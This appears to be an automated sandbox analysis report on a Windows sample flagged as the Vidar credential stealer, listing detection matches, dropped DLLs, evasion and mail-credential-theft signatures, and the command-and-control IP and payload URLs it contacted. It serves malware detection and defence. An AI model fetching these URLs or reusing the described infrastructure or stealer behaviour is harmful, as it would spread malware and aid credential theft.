Source: Yara match File source: 0.2.file.exe.940000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1910986531.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1684985635.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1911292762.0000000000941000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1519233 Sample: file.exe Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 20 Suricata IDS alerts for network traffic 2->20 22 Found malware configuration 2->22 24 Antivirus detection for URL or domain 2->24 26 9 other signatures 2->26 5 file.exe 33 2->5         started        process3 dnsIp4 18 185.215.113.37, 49730, 80 WHOLESALECONNECTIONSNL Portugal 5->18 10 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 5->10 dropped 12 C:\Users\user\AppData\...\softokn3[1].dll, PE32 5->12 dropped 14 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 5->14 dropped 16 9 other files (none is malicious) 5->16 dropped 28 Detected unpacking (changes PE section rights) 5->28 30 Tries to detect sandboxes and other dynamic analysis tools (window names) 5->30 32 Tries to steal Mail credentials (via file / registry access) 5->32 34 12 other signatures 5->34 file5 signatures6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.37/ true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.37/e2b1563c6670f193.php true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll true
  • Avira URL Cloud: malware
 unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll true
  • Avira URL Cloud: malware
 unknown